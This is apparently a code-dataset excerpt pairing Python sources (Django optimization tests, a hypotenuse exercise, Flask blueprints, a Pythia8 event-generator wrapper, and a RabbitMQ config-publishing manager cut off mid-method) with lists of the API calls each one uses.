ts_j4d.tsv synSynth7.g
ts_norm_m3b.tsv synSynth7.g
ts_ratio_t2a.tsv synSynth7.g
vclamp_hh.tsv loadhh.py
'''
# Test API for optimizatin
class TestOptimization(TestCase):
# Output necessary info;
# Check if there is errors.
def handle_response(self,response):
if OUTPUT_STATUS:
print('Status: '+str(response.status_code))
if OUTPUT_JSON:
print(response.json())
self.assertEqual('', response.json()['error'])
# According to tsv_path and model_path,
# send REST request django.test.Client
def send_request(self, n_p, trl, tsv_path, model_path):
# 1.Set data
contents = {
"username": "unittest",
"num_processes": n_p,
"tolerance": trl,
'tsv_files': open(tsv_path, 'rb'),
'model_file': open(model_path, 'rb')
}
# 2. Send REST request, get response
response = self.test_client.post(self.test_url, contents)
return response
# 1.Build django.test.Client for sending REST requests
# 2. Get url using django.urls.reverse().
def setUp(self):
# build client
self.test_client = Client()
# set url
self.test_url = reverse('optimization-list')
# With num_processes as '1'
@tag('optimization')
def test_single_process(self):
""" Test optimization request: multi processes """
tsvs = TSV_ZIP_PATH
model = os.path.join(MODEL_DIR, 'Gs_To_PKA_31_May_2019.g')
r = self.send_request(1, 0.8, tsvs, model)
self.handle_response(r)
# With num_processes more than '1'
@tag('optimization')
def test_multi_process(self):
""" Test optimization request: single process """
tsvs = TSV_ZIP_PATH
model = os.path.join(MODEL_DIR, 'Gs_To_PKA_31_May_2019.g')
r = self.send_request(6, 0.6, tsvs, model)
self.handle_response(r)
# django.SimpleTestCase is guaranteed to be ran after django.TestCase
# This class is for printing info after tests.
class TestFinishing(SimpleTestCase):
@tag('TS','BC','DR','DP','experiment')
def test_finishing_experiments(self):
print('-------TestCases finished-------')
html_path = TIME_STAMP + '.html'
html_path = os.path.join(HTML_DIR, html_path)
if OUTPUT_HTML:
print('==================================================Notice==================================================')
print('||')
print('|| You can find figures in ', html_path)
print('||')
print('==========================================================================================================')
|
[
"django.test.Client",
"django.urls.reverse",
"django.test.tag",
"os.path.join",
"time.localtime"
] |
[((2542, 2565), 'django.test.tag', 'tag', (['"""BC"""', '"""experiment"""'], {}), "('BC', 'experiment')\n", (2545, 2565), False, 'from django.test import tag\n'), ((2864, 2887), 'django.test.tag', 'tag', (['"""DP"""', '"""experiment"""'], {}), "('DP', 'experiment')\n", (2867, 2887), False, 'from django.test import tag\n'), ((3378, 3401), 'django.test.tag', 'tag', (['"""DR"""', '"""experiment"""'], {}), "('DR', 'experiment')\n", (3381, 3401), False, 'from django.test import tag\n'), ((3903, 3926), 'django.test.tag', 'tag', (['"""TS"""', '"""experiment"""'], {}), "('TS', 'experiment')\n", (3906, 3926), False, 'from django.test import tag\n'), ((6680, 6699), 'django.test.tag', 'tag', (['"""optimization"""'], {}), "('optimization')\n", (6683, 6699), False, 'from django.test import tag\n'), ((7017, 7036), 'django.test.tag', 'tag', (['"""optimization"""'], {}), "('optimization')\n", (7020, 7036), False, 'from django.test import tag\n'), ((7468, 7509), 'django.test.tag', 'tag', (['"""TS"""', '"""BC"""', '"""DR"""', '"""DP"""', '"""experiment"""'], {}), "('TS', 'BC', 'DR', 'DP', 'experiment')\n", (7471, 7509), False, 'from django.test import tag\n'), ((2219, 2227), 'django.test.Client', 'Client', ([], {}), '()\n', (2225, 2227), False, 'from django.test import Client\n'), ((2270, 2296), 'django.urls.reverse', 'reverse', (['"""experiment-list"""'], {}), "('experiment-list')\n", (2277, 2296), False, 'from django.urls import reverse\n'), ((2378, 2411), 'os.path.join', 'os.path.join', (['HTML_DIR', 'html_path'], {}), '(HTML_DIR, html_path)\n', (2390, 2411), False, 'import os\n'), ((2688, 2729), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""bc_ratio_sb8.tsv"""'], {}), "(TSV_DIR, 'bc_ratio_sb8.tsv')\n", (2700, 2729), False, 'import os\n'), ((2746, 2784), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (2758, 2784), False, 'import os\n'), ((3014, 3052), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""dp_Kd_tau.tsv"""'], 
{}), "(TSV_DIR, 'dp_Kd_tau.tsv')\n", (3026, 3052), False, 'import os\n'), ((3069, 3107), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (3081, 3107), False, 'import os\n'), ((3212, 3243), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""dp.tsv"""'], {}), "(TSV_DIR, 'dp.tsv')\n", (3224, 3243), False, 'import os\n'), ((3260, 3298), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (3272, 3298), False, 'import os\n'), ((3528, 3569), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""dr_ratio_b2c.tsv"""'], {}), "(TSV_DIR, 'dr_ratio_b2c.tsv')\n", (3540, 3569), False, 'import os\n'), ((3586, 3624), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (3598, 3624), False, 'import os\n'), ((3733, 3768), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""dr_j2c.tsv"""'], {}), "(TSV_DIR, 'dr_j2c.tsv')\n", (3745, 3768), False, 'import os\n'), ((3785, 3823), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (3797, 3823), False, 'import os\n'), ((4050, 4090), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""iclamp_hh13.tsv"""'], {}), "(TSV_DIR, 'iclamp_hh13.tsv')\n", (4062, 4090), False, 'import os\n'), ((4107, 4143), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""loadhh.py"""'], {}), "(MODEL_DIR, 'loadhh.py')\n", (4119, 4143), False, 'import os\n'), ((4255, 4293), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""vclamp_hh.tsv"""'], {}), "(TSV_DIR, 'vclamp_hh.tsv')\n", (4267, 4293), False, 'import os\n'), ((4310, 4346), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""loadhh.py"""'], {}), "(MODEL_DIR, 'loadhh.py')\n", (4322, 4346), False, 'import os\n'), ((4455, 4490), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""ts_j4d.tsv"""'], {}), "(TSV_DIR, 'ts_j4d.tsv')\n", (4467, 4490), False, 'import os\n'), ((4507, 4545), 'os.path.join', 'os.path.join', 
(['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (4519, 4545), False, 'import os\n'), ((4659, 4699), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""ts_norm_m3b.tsv"""'], {}), "(TSV_DIR, 'ts_norm_m3b.tsv')\n", (4671, 4699), False, 'import os\n'), ((4716, 4754), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (4728, 4754), False, 'import os\n'), ((4869, 4910), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""ts_ratio_t2a.tsv"""'], {}), "(TSV_DIR, 'ts_ratio_t2a.tsv')\n", (4881, 4910), False, 'import os\n'), ((4927, 4965), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (4939, 4965), False, 'import os\n'), ((6562, 6570), 'django.test.Client', 'Client', ([], {}), '()\n', (6568, 6570), False, 'from django.test import Client\n'), ((6613, 6641), 'django.urls.reverse', 'reverse', (['"""optimization-list"""'], {}), "('optimization-list')\n", (6620, 6641), False, 'from django.urls import reverse\n'), ((6838, 6888), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""Gs_To_PKA_31_May_2019.g"""'], {}), "(MODEL_DIR, 'Gs_To_PKA_31_May_2019.g')\n", (6850, 6888), False, 'import os\n'), ((7173, 7223), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""Gs_To_PKA_31_May_2019.g"""'], {}), "(MODEL_DIR, 'Gs_To_PKA_31_May_2019.g')\n", (7185, 7223), False, 'import os\n'), ((7660, 7693), 'os.path.join', 'os.path.join', (['HTML_DIR', 'html_path'], {}), '(HTML_DIR, html_path)\n', (7672, 7693), False, 'import os\n'), ((1009, 1025), 'time.localtime', 'time.localtime', ([], {}), '()\n', (1023, 1025), False, 'import time\n')]
|
from math import hypot
print("{:=^25}".format(" DESAFIO 017 "))
print("{:=^25}".format(" Cálculo da hipotenusa "), end="\n\n")
opposite_leg = float(input("Comprimento do cateto oposto: "))
adjacent_leg = float(input("Comprimento do cateto adjacente: "))
# hypotenuse = ((opposite_leg ** 2) + (adjacent_leg ** 2)) ** (1/2)
hypotenuse = hypot(opposite_leg, adjacent_leg)
print("Com o CO igual a {} e CA {} a hipotenusa equivale a {:.2f}".format(opposite_leg, adjacent_leg, hypotenuse))
|
[
"math.hypot"
] |
[((338, 371), 'math.hypot', 'hypot', (['opposite_leg', 'adjacent_leg'], {}), '(opposite_leg, adjacent_leg)\n', (343, 371), False, 'from math import hypot\n')]
|
from flask import Blueprint
bp_location = Blueprint('location', __name__, template_folder="templates", url_prefix='/location')
from .views.location import *
bp_entity = Blueprint('entity', __name__, template_folder="templates", url_prefix='/entity')
from .views.entity import *
|
[
"flask.Blueprint"
] |
[((43, 132), 'flask.Blueprint', 'Blueprint', (['"""location"""', '__name__'], {'template_folder': '"""templates"""', 'url_prefix': '"""/location"""'}), "('location', __name__, template_folder='templates', url_prefix=\n '/location')\n", (52, 132), False, 'from flask import Blueprint\n'), ((171, 256), 'flask.Blueprint', 'Blueprint', (['"""entity"""', '__name__'], {'template_folder': '"""templates"""', 'url_prefix': '"""/entity"""'}), "('entity', __name__, template_folder='templates', url_prefix='/entity'\n )\n", (180, 256), False, 'from flask import Blueprint\n')]
|
"""
``showerpipe.generator``
=====================
The ShowerPipe Generator module provides a standardised Pythonic
interface to showering and hadronisation programs.
Data is generated using Python iterator objects, and provided in
NumPy arrays.
Notes
-----
The classes provided here are concrete implementations of the abstract
GeneratorAdapter class. Currently only PythiaGenerator has been
implemented, however this module may be extended with additional
concrete implementations of GeneratorAdapter. Future versions are
planned to include HerwigGenerator and AriadneGenerator interfaces.
"""
import os
import tempfile
import shutil
from functools import cached_property
from typing import Optional
import numpy as np
from typicle import Types # type: ignore
from showerpipe._base import GeneratorAdapter
from showerpipe import _dataframe
from showerpipe.lhe import count_events, source_adapter, _LHE_STORAGE
class PythiaGenerator(GeneratorAdapter):
"""Wrapper of Pythia8 generator. Provides an iterator over
successive showered events, whose properties expose the data
generated via NumPy arrays.
Parameters
----------
config_file : str
Path to Pythia .cmnd configuration file.
me_file : Pathlike, string, or bytes
The variable or filepath containing the LHE data. May be a path,
string, or bytes object. If file, may be compressed with gzip.
rng_seed : int
Seed passed to the random number generator used by Pythia.
types : typicle.Types
Data container defining the types of the output physics data.
Returns
-------
out : iterator
Upon iteration a new particle shower is triggered, whose data
is accessible via the following properties:
edges : ndarray
Edge list representing generation ancestry of the event
as a directed acyclic graph.
Provided in a structured array, with fields 'in', 'out'.
pmu : ndarray
Four momentum provided in a structured array, with
fields 'x', 'y', 'z', 'e'.
pdg : ndarray
Particle Data Group identity codes for each particle.
color : ndarray
Color / anticolor pairs for each particle, provided
in a structured array with fields 'color', 'anticolor'.
final : ndarray
Mask over the particle list, to extract only those in
their final state.
"""
import pythia8 as __pythia_lib
import pandas as __pd
def __init__(
self,
config_file: str,
me_file: Optional[_LHE_STORAGE] = None,
rng_seed: int = 1,
types: Types = Types()
):
self.xml_dir = os.environ['PYTHIA8DATA']
pythia = self.__pythia_lib.Pythia(
xmlDir=self.xml_dir, printBanner=False)
pythia.readFile(config_file)
pythia.readString("Print:quiet = on")
pythia.readString("Random:setSeed = on")
pythia.readString(f"Random:seed = {rng_seed}")
if me_file is not None:
self.__num_events = count_events(me_file)
with source_adapter(me_file) as lhe_file:
self.temp_me_file = tempfile.NamedTemporaryFile()
shutil.copyfileobj(lhe_file, self.temp_me_file)
self.temp_me_file.seek(0)
me_path = self.temp_me_file.name
pythia.readString("Beams:frameType = 4")
pythia.readString(f"Beams:LHEF = {me_path}")
pythia.init()
pmu_type = types.pmu[0][1]
color_type = types.color[0][1]
edge_type = types.edge[0][1]
self.__types = {
'pdg': types.pdg,
'final': types.final,
'x': pmu_type,
'y': pmu_type,
'z': pmu_type,
'e': pmu_type,
'color': color_type,
'anticolor': color_type,
'in': edge_type,
'out': edge_type,
'status': types.h_int,
'helicity': types.h_int,
}
self.__pythia = pythia
def __iter__(self):
return self
def __len__(self):
try:
return self.__num_events
except AttributeError:
raise NotImplementedError(
'Length only defined when initialised with LHE file.')
def __next__(self):
if self.__pythia is None:
raise RuntimeError("Pythia generator not initialised.")
is_next = self.__pythia.next()
if not is_next:
if hasattr(self, 'temp_me_file'):
self.temp_me_file.close()
raise StopIteration("No more events left to be showered.")
if self.__event_df is not None:
del self.__event_df
if self.count is not None:
del self.count
return self
@cached_property
def __event_df(self) -> __pd.DataFrame:
def sorted_tuple(iterable):
list_object = list(iterable)
list_object.sort()
return tuple(list_object)
event_df = self.__pd.DataFrame(
map(lambda pcl: {
'index': pcl.index(),
'pdg': pcl.id(),
'final': pcl.isFinal(),
'x': pcl.px(),
'y': pcl.py(),
'z': pcl.pz(),
'e': pcl.e(),
'color': pcl.col(),
'status': pcl.status(),
'helicity': pcl.pol(),
'anticolor': pcl.acol(),
'parents': sorted_tuple(pcl.motherList()),
}, self.__pythia.event),
)
event_df = event_df.set_index('index')
event_df = event_df[event_df['pdg'] != 90]
vertex_df = _dataframe.vertex_df(event_df)
event_df = _dataframe.add_edge_cols(event_df, vertex_df)
event_df = event_df.drop(columns=['parents'])
event_df = event_df.astype(self.__types, copy=False)
event_df['out'] *= -1
event_df['in'] *= -1
return event_df
@cached_property
def count(self) -> int:
"""The number of particles in the event."""
return len(self.__event_df)
@property
def edges(self) -> np.ndarray:
return _dataframe.df_to_struc(self.__event_df[['in', 'out']])
@property
def pmu(self) -> np.ndarray:
return _dataframe.df_to_struc(self.__event_df[['x', 'y', 'z', 'e']])
@property
def color(self) -> np.ndarray:
return _dataframe.df_to_struc(self.__event_df[['color', 'anticolor']])
@property
def pdg(self) -> np.ndarray:
return self.__event_df['pdg'].values
@property
def final(self) -> np.ndarray:
return self.__event_df['final'].values
@property
def helicity(self) -> np.ndarray:
"""The polarisation of the particles. Particles without a
polarisation (or where it is unknown) have a value of 9.
"""
return self.__event_df['helicity'].values
@property
def status(self) -> np.ndarray:
"""Pythia-specific status codes. See link for details.
https://pythia.org/latest-manual/ParticleProperties.html
"""
return self.__event_df['status'].values
|
[
"tempfile.NamedTemporaryFile",
"typicle.Types",
"showerpipe._dataframe.df_to_struc",
"showerpipe.lhe.source_adapter",
"showerpipe._dataframe.vertex_df",
"showerpipe.lhe.count_events",
"shutil.copyfileobj",
"showerpipe._dataframe.add_edge_cols"
] |
[((2755, 2762), 'typicle.Types', 'Types', ([], {}), '()\n', (2760, 2762), False, 'from typicle import Types\n'), ((5927, 5957), 'showerpipe._dataframe.vertex_df', '_dataframe.vertex_df', (['event_df'], {}), '(event_df)\n', (5947, 5957), False, 'from showerpipe import _dataframe\n'), ((5977, 6022), 'showerpipe._dataframe.add_edge_cols', '_dataframe.add_edge_cols', (['event_df', 'vertex_df'], {}), '(event_df, vertex_df)\n', (6001, 6022), False, 'from showerpipe import _dataframe\n'), ((6424, 6478), 'showerpipe._dataframe.df_to_struc', '_dataframe.df_to_struc', (["self.__event_df[['in', 'out']]"], {}), "(self.__event_df[['in', 'out']])\n", (6446, 6478), False, 'from showerpipe import _dataframe\n'), ((6542, 6603), 'showerpipe._dataframe.df_to_struc', '_dataframe.df_to_struc', (["self.__event_df[['x', 'y', 'z', 'e']]"], {}), "(self.__event_df[['x', 'y', 'z', 'e']])\n", (6564, 6603), False, 'from showerpipe import _dataframe\n'), ((6669, 6732), 'showerpipe._dataframe.df_to_struc', '_dataframe.df_to_struc', (["self.__event_df[['color', 'anticolor']]"], {}), "(self.__event_df[['color', 'anticolor']])\n", (6691, 6732), False, 'from showerpipe import _dataframe\n'), ((3169, 3190), 'showerpipe.lhe.count_events', 'count_events', (['me_file'], {}), '(me_file)\n', (3181, 3190), False, 'from showerpipe.lhe import count_events, source_adapter, _LHE_STORAGE\n'), ((3208, 3231), 'showerpipe.lhe.source_adapter', 'source_adapter', (['me_file'], {}), '(me_file)\n', (3222, 3231), False, 'from showerpipe.lhe import count_events, source_adapter, _LHE_STORAGE\n'), ((3281, 3310), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {}), '()\n', (3308, 3310), False, 'import tempfile\n'), ((3327, 3374), 'shutil.copyfileobj', 'shutil.copyfileobj', (['lhe_file', 'self.temp_me_file'], {}), '(lhe_file, self.temp_me_file)\n', (3345, 3374), False, 'import shutil\n')]
|
import fnmatch
import logging
import os
import sys
import threading
import time
from configparser import (ConfigParser, DuplicateSectionError,
DuplicateOptionError, InterpolationError,
ParsingError)
from datetime import datetime
from types import FrameType
from typing import List, Optional, Callable
import pika
from pika.adapters.blocking_connection import BlockingChannel
from pika.exceptions import AMQPChannelError, AMQPConnectionError
from watchdog.events import FileSystemEvent
from watchdog.observers.polling import PollingObserver
from src.abstract.publisher_subscriber import \
QueuingPublisherSubscriberComponent
from src.message_broker.rabbitmq import RabbitMQApi
from src.utils import env
from src.utils import routing_key
from src.utils.constants.rabbitmq import (
CONFIG_EXCHANGE, HEALTH_CHECK_EXCHANGE, CONFIGS_MANAGER_HEARTBEAT_QUEUE,
PING_ROUTING_KEY, HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY, TOPIC)
from src.utils.constants.starters import RE_INITIALISE_SLEEPING_PERIOD
from src.utils.exceptions import (MessageWasNotDeliveredException,
ConnectionNotInitialisedException)
from .config_update_event_handler import ConfigFileEventHandler
from ..utils.logging import log_and_print
# Synthetic event type used by ConfigsManager.start() when it broadcasts every
# existing config file once at component startup.
_FIRST_RUN_EVENT = 'first run'
class ConfigsManager(QueuingPublisherSubscriberComponent):
    """
    This class reads all configurations and sends them over to the "config"
    topic in RabbitMQ. Updated configs are sent as well.

    Two separate RabbitMQ connections are kept: one for publishing configs and
    one for the health-check (heartbeat) traffic.
    """

    def __init__(self, name: str, logger: logging.Logger, config_directory: str,
                 rabbit_ip: str, file_patterns: Optional[List[str]] = None,
                 ignore_file_patterns: Optional[List[str]] = None,
                 ignore_directories: bool = True, case_sensitive: bool = False):
        """
        Constructs the ConfigsManager instance
        :param name: The name of this component
        :param logger: The logger used by this component
        :param config_directory: The root config directory to watch.
            This is searched recursively.
        :param rabbit_ip: The IP/hostname of the RabbitMQ server
        :param file_patterns: The file patterns in the directory to watch.
            Defaults to all ini files
        :param ignore_file_patterns: Any file patterns to ignore.
            Defaults to None
        :param ignore_directories: Whether changes in directories should be
            ignored. Default: True
        :param case_sensitive: Whether the patterns in `file_patterns` and
            `ignore_file_patterns` are case sensitive. Defaults to False
        """
        if not file_patterns:
            file_patterns = ['*.ini']

        self._name = name
        self._config_directory = config_directory
        self._file_patterns = file_patterns
        self._watching = False
        self._connected_to_rabbit = False
        self._current_thread = None

        logger.debug("Creating config RabbitMQ connection")
        rabbitmq = RabbitMQApi(
            logger.getChild("config_{}".format(RabbitMQApi.__name__)),
            host=rabbit_ip)

        super().__init__(logger, rabbitmq,
                         env.CONFIG_PUBLISHING_QUEUE_SIZE)

        self._logger.debug("Creating heartbeat RabbitMQ connection")
        self._heartbeat_rabbit = RabbitMQApi(
            logger.getChild("heartbeat_{}".format(RabbitMQApi.__name__)),
            host=rabbit_ip)

        self._event_handler = ConfigFileEventHandler(
            self._logger.getChild(ConfigFileEventHandler.__name__),
            self._on_event_thrown,
            file_patterns,
            ignore_file_patterns,
            ignore_directories,
            case_sensitive
        )
        # PollingObserver works on every platform / network mount at the cost
        # of periodically re-scanning the tree.
        self._observer = PollingObserver()
        self._observer.schedule(self._event_handler, config_directory,
                                recursive=True)

    def __str__(self) -> str:
        return self.name

    @property
    def name(self) -> str:
        return self._name

    def _initialise_rabbitmq(self) -> None:
        """
        Declare exchanges, the heartbeat queue and the ping consumer on both
        RabbitMQ connections. Retries forever on channel errors; connection
        errors are re-raised to the caller.
        """
        while True:
            try:
                self._connect_to_rabbit()
                self._logger.info("Connected to Rabbit")
                self.rabbitmq.confirm_delivery()
                # Bug fix: the implicit string concatenation below was missing
                # a separating space ("configsRabbitMQ").
                self._logger.info("Enabled delivery confirmation on configs "
                                  "RabbitMQ channel")
                self.rabbitmq.exchange_declare(
                    CONFIG_EXCHANGE, TOPIC, False, True, False, False
                )
                self._logger.info("Declared %s exchange in Rabbit",
                                  CONFIG_EXCHANGE)
                self._heartbeat_rabbit.confirm_delivery()
                self._logger.info("Enabled delivery confirmation on heartbeat "
                                  "RabbitMQ channel")
                self._heartbeat_rabbit.exchange_declare(
                    HEALTH_CHECK_EXCHANGE, TOPIC, False, True, False, False
                )
                self._logger.info("Declared %s exchange in Rabbit",
                                  HEALTH_CHECK_EXCHANGE)
                # Bug fix: closing quote was missing around the last '%s'.
                self._logger.info(
                    "Creating and binding queue '%s' to exchange '%s' with "
                    "routing key '%s'", CONFIGS_MANAGER_HEARTBEAT_QUEUE,
                    HEALTH_CHECK_EXCHANGE, PING_ROUTING_KEY)
                self._heartbeat_rabbit.queue_declare(
                    CONFIGS_MANAGER_HEARTBEAT_QUEUE, False, True, False, False)
                self._logger.debug("Declared '%s' queue",
                                   CONFIGS_MANAGER_HEARTBEAT_QUEUE)
                self._heartbeat_rabbit.queue_bind(
                    CONFIGS_MANAGER_HEARTBEAT_QUEUE, HEALTH_CHECK_EXCHANGE,
                    PING_ROUTING_KEY)
                self._logger.debug("Bound queue '%s' to exchange '%s'",
                                   CONFIGS_MANAGER_HEARTBEAT_QUEUE,
                                   HEALTH_CHECK_EXCHANGE)

                # Pre-fetch count is set to 300 (round() around a literal was
                # a no-op and has been dropped).
                prefetch_count = 300
                self._heartbeat_rabbit.basic_qos(prefetch_count=prefetch_count)
                self._logger.debug("Declaring consuming intentions")
                self._heartbeat_rabbit.basic_consume(
                    CONFIGS_MANAGER_HEARTBEAT_QUEUE, self._process_ping, True,
                    False, None)
                break
            except (ConnectionNotInitialisedException,
                    AMQPConnectionError) as connection_error:
                # Should be impossible, but since exchange_declare can throw
                # it we shall ensure to log that the error passed through here
                # too.
                self._logger.error(
                    "Something went wrong that meant a connection was not made")
                self._logger.error(connection_error)
                raise connection_error
            except AMQPChannelError:
                # This error would have already been logged by the RabbitMQ
                # logger and handled by RabbitMQ. As a result we don't need to
                # do anything here, just re-try.
                time.sleep(RE_INITIALISE_SLEEPING_PERIOD)

    def _connect_to_rabbit(self) -> None:
        """Open both RabbitMQ connections (idempotent)."""
        if not self._connected_to_rabbit:
            self._logger.info("Connecting to the config RabbitMQ")
            self.rabbitmq.connect_till_successful()
            self._logger.info("Connected to config RabbitMQ")
            self._logger.info("Connecting to the heartbeat RabbitMQ")
            self._heartbeat_rabbit.connect_till_successful()
            self._logger.info("Connected to heartbeat RabbitMQ")
            self._connected_to_rabbit = True
        else:
            self._logger.info(
                "Already connected to RabbitMQ, will not connect again")

    def disconnect_from_rabbit(self) -> None:
        """Close both RabbitMQ connections (idempotent)."""
        if self._connected_to_rabbit:
            self._logger.info("Disconnecting from the config RabbitMQ")
            self.rabbitmq.disconnect_till_successful()
            self._logger.info("Disconnected from the config RabbitMQ")
            self._logger.info("Disconnecting from the heartbeat RabbitMQ")
            self._heartbeat_rabbit.disconnect_till_successful()
            self._logger.info("Disconnected from the heartbeat RabbitMQ")
            self._connected_to_rabbit = False
        else:
            self._logger.info("Already disconnected from RabbitMQ")

    def _send_heartbeat(self, data_to_send: dict) -> None:
        """Publish a single heartbeat message on the health-check exchange."""
        self._logger.debug("Sending heartbeat to the %s exchange",
                           HEALTH_CHECK_EXCHANGE)
        self._logger.debug("Sending %s", data_to_send)
        self._heartbeat_rabbit.basic_publish_confirm(
            exchange=HEALTH_CHECK_EXCHANGE,
            routing_key=HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY, body=data_to_send,
            # delivery_mode=2 marks the message persistent.
            is_body_dict=True, properties=pika.BasicProperties(delivery_mode=2),
            mandatory=True)
        self._logger.debug("Sent heartbeat to %s exchange",
                           HEALTH_CHECK_EXCHANGE)

    def _process_ping(self, ch: BlockingChannel,
                      method: pika.spec.Basic.Deliver,
                      properties: pika.spec.BasicProperties,
                      body: bytes) -> None:
        """Answer a health-check ping with a heartbeat ("pong")."""
        self._logger.debug("Received %s. Let's pong", body)
        try:
            heartbeat = {
                'component_name': self.name,
                'is_alive': self._observer.is_alive(),
                'timestamp': datetime.now().timestamp(),
            }
            self._send_heartbeat(heartbeat)
        except MessageWasNotDeliveredException as e:
            # Log the message and do not raise it as heartbeats must be
            # real-time
            self._logger.error("Error when sending heartbeat")
            self._logger.exception(e)

    def _on_event_thrown(self, event: FileSystemEvent) -> None:
        """
        When an event is thrown, it reads the config and sends it as a dict via
        rabbitmq to the config exchange of type topic
        with the routing key determined by the relative file path.
        :param event: The event passed by watchdog
        :return None
        """
        self._logger.debug("Event thrown: %s", event)
        self._logger.info("Detected a config %s in %s", event.event_type,
                          event.src_path)

        if event.event_type == "deleted":
            # A deleted config is broadcast as an empty dict so consumers can
            # drop their copy.
            self._logger.debug("Creating empty dict")
            config_dict = {}
        else:
            config = ConfigParser()

            self._logger.debug("Reading configuration")
            try:
                config.read(event.src_path)
            except (
                    DuplicateSectionError, DuplicateOptionError,
                    InterpolationError, ParsingError
            ) as e:
                self._logger.error(e.message)
                # When the config is invalid, we do nothing and discard this
                # event.
                return None

            self._logger.debug("Config read successfully")

            config_dict = {key: dict(config[key]) for key in config}

        self._logger.debug("Config converted to dict: %s", config_dict)

        # Since the watcher is configured to watch files in
        # self._config_directory we only need check that (for get_routing_key)
        config_folder = os.path.normpath(self._config_directory)

        key = routing_key.get_routing_key(event.src_path, config_folder)
        self._logger.debug("Sending config %s to RabbitMQ with routing key %s",
                           config_dict, key)
        self._push_to_queue(config_dict, CONFIG_EXCHANGE, key)

    @property
    def config_directory(self) -> str:
        return self._config_directory

    @property
    def watching(self) -> bool:
        return self._watching

    @property
    def connected_to_rabbit(self) -> bool:
        return self._connected_to_rabbit

    def start(self) -> None:
        """
        This method is used to start rabbit and the observer and begin watching
        the config files. It also sends the configuration files for the first
        time
        :return None
        """
        log_and_print("{} started.".format(self), self._logger)
        self._initialise_rabbitmq()

        # Start a thread that connects to RabbitMQ and begins attempts to send
        # configs from the publishing queue.
        self._create_and_start_sending_configs_thread()

        def do_first_run_event(name: str) -> None:
            # Broadcast an existing config file as a synthetic first-run event.
            event = FileSystemEvent(name)
            event.event_type = _FIRST_RUN_EVENT
            self._on_event_thrown(event)

        self._logger.info("Throwing first run event for all config files")
        self.foreach_config_file(do_first_run_event)

        if not self._watching:
            self._logger.info("Starting config file observer")
            self._observer.start()
            self._watching = True
        else:
            self._logger.info("File observer is already running")

        self._logger.debug("Config file observer started")
        self._connect_to_rabbit()
        self._listen_for_data()

    def _sending_configs_thread(self) -> None:
        """
        Continuously drain the publishing queue, re-establishing the RabbitMQ
        connection whenever it drops. Runs until the process exits.
        """
        while True:
            try:
                if not self.publishing_queue.empty():
                    try:
                        self._send_data()
                    except MessageWasNotDeliveredException as e:
                        self.logger.exception(e)
            except (ConnectionNotInitialisedException,
                    AMQPConnectionError) as e:
                # If the connection is not initialised or there is a connection
                # error, we need to restart the connection and try it again
                self._logger.error("There has been a connection error")
                self._logger.exception(e)
                self._logger.info("Restarting the connection")
                self._connected_to_rabbit = False

                # Wait some time before reconnecting and then retrying
                time.sleep(RE_INITIALISE_SLEEPING_PERIOD)
                self._connect_to_rabbit()
                self._logger.info("Connection restored, will attempt sending "
                                  "the config.")
            except AMQPChannelError as e:
                # This error would have already been logged by the RabbitMQ
                # logger and handled by RabbitMQ. Since a new channel is
                # created we need to re-initialise RabbitMQ.
                self._initialise_rabbitmq()
                # Bug fix: the original `raise e` referenced a name that was
                # never bound in this handler (except targets are deleted when
                # their block ends), so it raised NameError and masked the real
                # channel error. Binding the exception with `as e` fixes that.
                raise e
            self.rabbitmq.connection.sleep(10)

    def _create_and_start_sending_configs_thread(self) -> None:
        """Spawn the background thread that publishes queued configs."""
        try:
            self._current_thread = threading.Thread(
                target=self._sending_configs_thread)
            self._current_thread.start()
        except Exception as e:
            self._logger.error("Failed to start sending configs thread!")
            self._logger.exception(e)
            raise e

    def _terminate_and_stop_sending_configs_thread(self) -> None:
        # NOTE(review): the sending thread runs an unconditional `while True`
        # loop, so this join can only return if the thread dies on an
        # exception — confirm whether a stop flag is needed.
        if self._current_thread is not None:
            self._current_thread.join()
            self._current_thread = None

    def _listen_for_data(self) -> None:
        """Block consuming health-check pings on the heartbeat channel."""
        self._logger.info("Starting the config ping listener")
        self._heartbeat_rabbit.start_consuming()

    def _on_terminate(self, signum: int, stack: FrameType) -> None:
        """
        This method is used to stop the observer and join the threads
        """
        log_and_print("{} is terminating. Connections with RabbitMQ will be "
                      "closed, and afterwards the process will exit."
                      .format(self), self._logger)

        if self._watching:
            self._logger.info("Stopping config file observer")
            self._observer.stop()
            self._observer.join()
            self._watching = False
            self._logger.debug("Config file observer stopped")
        else:
            self._logger.info("Config file observer already stopped")
        self.disconnect_from_rabbit()
        self._terminate_and_stop_sending_configs_thread()
        log_and_print("{} terminated.".format(self), self._logger)
        sys.exit()

    def foreach_config_file(self, callback: Callable[[str], None]) -> None:
        """
        Runs a function over all the files being watched by this class
